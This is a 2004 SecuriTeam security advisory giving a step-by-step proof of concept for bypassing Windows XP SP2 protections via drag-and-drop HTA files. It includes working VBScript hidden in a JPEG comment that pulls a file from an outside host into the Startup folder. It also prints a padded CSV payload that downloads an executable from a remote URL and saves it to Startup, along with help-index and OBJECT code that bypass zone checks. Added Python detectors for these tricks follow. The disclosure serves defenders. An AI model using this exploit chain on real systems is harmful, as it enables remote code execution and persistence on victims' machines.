[NT] How to Break Windows XP SP2 (Drag and Drop Media Files) - Proof of Concept

From: SecuriTeam (support_at_securiteam.com)
Date: 10/25/04

    To: list@securiteam.com
    Date: 25 Oct 2004 18:54:03 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      How to Break Windows XP SP2 (Drag and Drop Media Files) - Proof of Concept
    ------------------------------------------------------------------------

    SUMMARY

    This article follows http-equiv's earlier article
    (<http://www.securiteam.com/windowsntfocus/6N00L1FBFW.html>) on exploiting
    Windows XP SP2 through drag and drop of .hta files to execute arbitrary
    code in the Local Zone. This article walks through a detailed proof of
    concept that demonstrates the vulnerability.

    DETAILS

    It is possible to execute machine code with a series of HTML commands on
    a Windows XP SP2 system. It is getting harder and harder these days, so be
    ready for a long, confusing paper.

    Running the Proof of Concept:
     * All files for the proof of concept can be found here:
    <http://www.michaelevanchik.com/kara/scrolll/files.zip>
     * Open the index HTML:
    <http://www.michaelevanchik.com/kara/scrolll/index.html> (or the one in
    files.zip)
     * Scroll down on this webpage and click the display button as directed.
     * You will then notice an .hta file in: start > programs > start up >
    real scheduler.hta
     * That's it! Every time 'real scheduler.hta' runs, our code runs in the
    Local Zone.

    How it Works:
    1. malwarez6.mcb:
     * Create an image file and place the source code that http-equiv
    provided (shown below) into a comment section of the image. In Photoshop
    this can be done via: file menu > file info > comment field, then paste
    the source code below.
    Here is http-equiv's code; it was modified to inject the .hta file into
    the Startup folder instead.

    malwarez6.mcb comment source:
    <script language="vbs">
    Dim Conn, rs
    Set Conn = CreateObject("ADODB.Connection")
    Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
    "Dbq=http://arite.zapto.org;" & _
    "Extensions=asc,csv,tab,txt;" & _
    "Persist Security Info=False"
    Dim sql
    sql = "SELECT * from foobar.txt"
    set rs = conn.execute(sql)
    set rs =CreateObject("ADODB.recordset")
    rs.Open "SELECT * from foobar.txt", conn
    rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\real scheduler.hta", adPersistXML
    rs.close
    conn.close
    </script>

    Note: There is one thing you need to know about this code. Oddly, "select
    * from foobar.txt" not only issues a GET request for foobar.txt on the web
    server, it also logs in anonymously to an FTP server on the same host. If
    your server does not allow both, the vulnerability will not work.
     * Save the file as a JPEG. Rename it to malwarez6.mcb

    2. foobar.txt:
    This was the most difficult part. From the information http-equiv gave us,
    it seemed this vulnerability could have been dismissed, since you could
    not fit enough scriptable code into the .hta file without the script
    compiler erroring because binary/ASCII code broke the VBScript. What was
    uncovered is that this text file needs to be in a comma-delimited format.
    Not only that, each side of each line of code needs to be padded with a
    dummy variable to keep the code "alive" so it does not error. Notice the
    variable "crap"; the first and last lines are also dummies, without which
    the code would not have worked. HTA files are still a big hole for
    Microsoft. All the patching they have done against exploits, and the
    creation of XP Service Pack 2, was a godsend, yet HTA files are not
    covered by ANY of these new features. So in the end it is simply a matter
    of putting an old and easy exe-running exploit inside this .hta file.

    foobar.txt source:
    "meaning less shit i had to put here"
    "<script language=vbscript> crap = """
    """: on error resume next: crap = """
    """ : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
    """ : o.open ""GET"",""http://hometown.aol.com/mcbain/calc.exe"",False : crap="""
    """ : o.send : crap="""
    """ : set s = createobject(""adodb.stream"") : crap="""
    """ : s.type=1 : crap="""
    """ : s.open : crap="""
    """ : s.write o.responseBody : crap="""
    """ : s.savetofile ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\RealAudio.exe"",2 : crap="""
    """</script> crap="""

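    The following is an added defender-side example and is not part of the advisory or the PoC files. The advisory explains that foobar.txt only works as a CSV whose every row is a quoted field padded with a dummy assignment, so a reviewer looking at the raw file sees doubled quotes and per-line noise. This helper undoes the CSV quoting with Python's standard csv module, then runs a small indicator set (the names are ours) for the download-and-execute chain the advisory describes: XMLHTTP fetch, ADODB.Stream, SaveToFile into a Startup folder. The sample rows are constructed; the URL, dummy variable and dropped file name are placeholders.

```python
"""Recover and triage VBScript split across a quoted, comma-delimited file.

Added example, not part of the SecuriTeam advisory or the PoC files. The
indicator names and the sample rows below are our own constructions.
"""
import csv
import io
import re

# Indicators for the chain described in the advisory; names are our own.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "error_suppression": re.compile(r"\bon\s+error\s+resume\s+next\b", re.I),
    "http_fetch": re.compile(r"(?:msxml2|microsoft)\.xmlhttp", re.I),
    "binary_stream": re.compile(r"adodb\.stream", re.I),
    "write_to_disk": re.compile(r"\.savetofile\b", re.I),
    "startup_folder": re.compile(r"\\start\s*menu\\programs\\startup\\", re.I),
}
# Fetch + binary stream + write to disk together make up the execution chain.
EXEC_CHAIN = {"http_fetch", "binary_stream", "write_to_disk"}


def recover_script(csv_text: str) -> str:
    """Join every quoted CSV field back into one readable script body.

    csv.reader collapses the doubled quotes ("") that the padding relies on,
    so each row comes back as the VBScript fragment it carries.
    """
    rows = csv.reader(io.StringIO(csv_text))
    return "\n".join(field for row in rows for field in row)


def triage(text: str) -> dict:
    """Return the indicator names hit and a verdict for a script body."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    if EXEC_CHAIN <= set(hits):
        verdict = "download-and-execute"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits}


# Constructed sample mirroring the padding layout from the advisory. The URL,
# the dummy variable "pad" and the dropped file name are placeholders.
SAMPLE_CSV = "\n".join([
    '"dummy first row"',
    '"<script language=vbscript> pad = """',
    '""" : on error resume next : pad = """',
    '""" : set o = CreateObject(""msxml2.XMLHTTP"") : pad = """',
    '""" : o.open ""GET"", ""http://example.invalid/payload.exe"", False : pad = """',
    '""" : o.send : pad = """',
    '""" : set s = CreateObject(""adodb.stream"") : s.type = 1 : s.open : pad = """',
    '""" : s.write o.responseBody : pad = """',
    '""" : s.savetofile ""C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\update.exe"", 2 : pad = """',
    '"""</script> pad = """',
    '"dummy last row"',
])

if __name__ == "__main__":
    script = recover_script(SAMPLE_CSV)
    print(script)
    print(triage(script))
```

    The recovered text is what an analyst wants to read; the indicators deliberately match on the object names and method calls rather than on quoting, so they fire on the raw file as well as on the recovered script.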
    3. index.html:
    Notice the following key code: <img id="dyn" src="malwarez6.mcb"
    border="0">
    According to http-equiv's post (malware.com) he was using a file with no
    extension. This did not work for Michael Evanchik on his IIS server, so an
    unused extension (.mcb) was used instead. In the IIS management console
    this MIME type was then added manually as a (.mcb text/html) entry. This
    image now gets by Microsoft's patch that stops executable content from
    being "draggable". Microsoft appears to inspect the file's content
    (regardless of the file extension or the content type the HTTP server
    sends) to decide whether it is an executable file.
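    The following is an added defender-side example and is not part of the advisory or the PoC files. The point above is that the browser judges a dragged file by its content rather than by extension or served MIME type, and that an image carrying script in a comment field passes that check. This walker parses the JPEG marker structure and reports any COM or APPn segment (Photoshop's File Info fields, for instance, are written to APP segments) that contains HTML or script markup, which is the check an upload filter, proxy or mail gateway can apply before such a file reaches a browser. The sample JPEGs are constructed marker skeletons with no real picture data.

```python
"""Detect HTML/script markup hidden in JPEG metadata segments.

Added example, not part of the SecuriTeam advisory or the PoC files. The
sample byte strings are constructed skeletons, not real images.
"""
import re
import struct

SOI, EOI, SOS, COM = 0xFFD8, 0xFFD9, 0xFFDA, 0xFFFE
APP0, APP15 = 0xFFE0, 0xFFEF
MARKUP_RE = re.compile(rb"<\s*(?:script|object|iframe|html|body|embed)\b", re.I)


def iter_segments(data: bytes):
    """Yield (marker, payload) for every marker segment before the scan data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = (data[pos] << 8) | data[pos + 1]
        if marker in (EOI, SOS):
            return  # picture data follows SOS; all metadata precedes it
        if 0xFFD0 <= marker <= 0xFFD7 or marker == 0xFF01:
            pos += 2  # RSTn / TEM markers carry no length field
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])  # counts itself
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"bad segment length at offset {pos}")
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def segment_name(marker: int) -> str:
    if marker == COM:
        return "COM"
    if APP0 <= marker <= APP15:
        return f"APP{marker - APP0}"
    return f"0x{marker:04X}"


def find_markup_in_metadata(data: bytes):
    """Return [(segment_name, snippet)] for metadata segments carrying markup."""
    hits = []
    for marker, payload in iter_segments(data):
        if marker == COM or APP0 <= marker <= APP15:
            m = MARKUP_RE.search(payload)
            if m:
                hits.append((segment_name(marker), payload[m.start():m.start() + 40]))
    return hits


def scan_file(path: str):
    """Convenience wrapper for scanning a file on disk."""
    with open(path, "rb") as fh:
        return find_markup_in_metadata(fh.read())


def build_segment(marker: int, payload: bytes) -> bytes:
    """Assemble one marker segment (length field counts itself plus payload)."""
    return struct.pack(">HH", marker, len(payload) + 2) + payload


# Constructed samples: SOI, a JFIF APP0 header, one metadata segment, then a
# placeholder SOS/EOI so each skeleton is structurally a JPEG.
_JFIF = build_segment(APP0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
_TAIL = b"\xff\xda" + b"\x00" * 8 + b"\xff\xd9"
CLEAN_JPEG = b"\xff\xd8" + _JFIF + build_segment(COM, b"holiday photo") + _TAIL
COMMENT_POLYGLOT = (b"\xff\xd8" + _JFIF
                    + build_segment(COM, b'<script language="vbs">MsgBox "demo"</script>')
                    + _TAIL)
# Photoshop-style metadata lands in APP13; the check must cover those segments too.
APP13_POLYGLOT = (b"\xff\xd8" + _JFIF
                  + build_segment(0xFFED, b"Photoshop 3.0\x00<SCRIPT>x</SCRIPT>")
                  + _TAIL)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_JPEG), ("comment", COMMENT_POLYGLOT),
                        ("app13", APP13_POLYGLOT)):
        print(label, find_markup_in_metadata(blob))
```

    The walker stops at SOS on purpose: everything a metadata editor can write sits before the entropy-coded picture data, so the scan is cheap even on large files, and a file that does not parse as a JPEG at all raises rather than being passed as clean.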

    4. cigar.hhk:
    The code in this file is self-explanatory:
    <OBJECT type="text/site properties">
        <param name="WindowName" value="$global_blank">
    </OBJECT>
    <UL>
        <LI> <OBJECT type="text/sitemap">
            <param name="Name" value="click display at bottom of page">
            <param name="Local" value="C:\WINDOWS\PCHealth\malwarez6[1].htm">
            <param name="WindowName" value="$global_blank">
            </OBJECT>
    </UL>
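    The following is an added defender-side example and is not part of the advisory or the PoC files. The sitemap entry above points its "Local" parameter at an absolute path under the WINDOWS directory rather than at a topic packaged with the help file. This parser extracts every text/sitemap entry from an .hhk with Python's standard-library HTMLParser and flags Local targets that are absolute, that reach into cache or system directories, or that carry the [n] suffix Internet Explorer appends to cached copies; the sample .hhk is constructed and the directory list is our own choice.

```python
r"""Audit an HTML Help index (.hhk) for sitemap entries that leave the help content.

Added example, not part of the SecuriTeam advisory or the PoC files. The
sample index and the list of risky directories are our own constructions.
"""
import re
from html.parser import HTMLParser


class SitemapParser(HTMLParser):
    """Collect <OBJECT type="text/sitemap"> entries and their <param> values."""

    def __init__(self):
        super().__init__()
        self.entries = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases attribute names, keeps values
        if tag == "object":
            obj_type = (a.get("type") or "").lower()
            # Only sitemap objects are index entries; site properties are skipped.
            self._current = {} if obj_type == "text/sitemap" else None
        elif tag == "param" and self._current is not None:
            self._current[(a.get("name") or "").lower()] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            self.entries.append(self._current)
            self._current = None


# Drive letter, UNC path or file: URL: none of these belong in a packaged index.
ABSOLUTE_TARGET = re.compile(r"^(?:[a-z]:[\\/]|\\\\|file:)", re.I)
# Directories an index has no business referencing (compared case-insensitively).
RISKY_DIRS = ("\\pchealth\\", "\\temporary internet files\\",
              "\\startup\\", "\\system32\\")
# name[1].htm style names are what Internet Explorer gives cached downloads.
CACHE_NAME = re.compile(r"\[\d+\]\.html?$", re.I)


def parse_hhk(text: str):
    """Return the list of sitemap entries (dicts of lowercased param names)."""
    p = SitemapParser()
    p.feed(text)
    p.close()
    return p.entries


def audit_hhk(text: str):
    """Return (name, local, reasons) for every entry worth a second look."""
    findings = []
    for entry in parse_hhk(text):
        local = entry.get("local", "")
        reasons = []
        if ABSOLUTE_TARGET.match(local):
            reasons.append("absolute path, not a packaged topic")
        if any(d in local.lower() for d in RISKY_DIRS):
            reasons.append("targets a cache or system directory")
        if CACHE_NAME.search(local):
            reasons.append("looks like a browser cache file name")
        if reasons:
            findings.append((entry.get("name", ""), local, reasons))
    return findings


# Constructed sample: one ordinary topic and one entry shaped like the advisory's.
SAMPLE_HHK = """<OBJECT type="text/site properties">
    <param name="WindowName" value="$global_blank">
</OBJECT>
<UL>
    <LI> <OBJECT type="text/sitemap">
        <param name="Name" value="Getting started">
        <param name="Local" value="intro.htm">
        </OBJECT>
    <LI> <OBJECT type="text/sitemap">
        <param name="Name" value="click display at bottom of page">
        <param name="Local" value="C:\\WINDOWS\\PCHealth\\sample[1].htm">
        <param name="WindowName" value="$global_blank">
        </OBJECT>
</UL>
"""

if __name__ == "__main__":
    for name, local, reasons in audit_hhk(SAMPLE_HHK):
        print(f"{name!r} -> {local}: {'; '.join(reasons)}")
```

    Relative topic names such as intro.htm pass untouched; only entries that escape the help package are reported, so the same audit can run over every .hhk or .hhc a user is about to open without drowning in noise.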

    5. frame.html:
    Mostly self-explanatory, though note the following code:

     <OBJECT style="height:650" style="width:250" id="hhctrl"
    type="application/x-oleobject"
    classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
    codebase="hhctrl.ocx#Version=5,2,3790,1194" width=7% height=7%
    style="position:absolute;top:140;left:72;z-index:100;">
        <PARAM name="Command" value="Index">
        <PARAM name="Item1" value="cigar.hhk">click me
    </OBJECT>

    Unfortunately, this object cannot be auto-clicked with hhctrl.click(), so
    for now this is the only step that requires user intervention. But when a
    user clicks this object, it runs the HTML file in the Local Zone,
    bypassing XP Service Pack 2 for the second time in this exploit.

    6. hhctrl.ocx:
    hhctrl.ocx should be uploaded for computers that don't happen to have
    this control. All XP systems seem to have it by default; some Windows 2003
    systems do not.

    Workarounds:
     * Disable .hta files.
     * Disable scripting in Internet Explorer.
     * Do not use Internet Explorer; use Mozilla Firefox (<http://mozilla.org>).

    ADDITIONAL INFORMATION

    The information has been provided by Michael Evanchik
    (<mailto:Mike@MichaelEvanchik.com>).
    The original article can be found at:
    <http://www.michaelevanchik.com/kara/scrolll/notagain.txt>

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

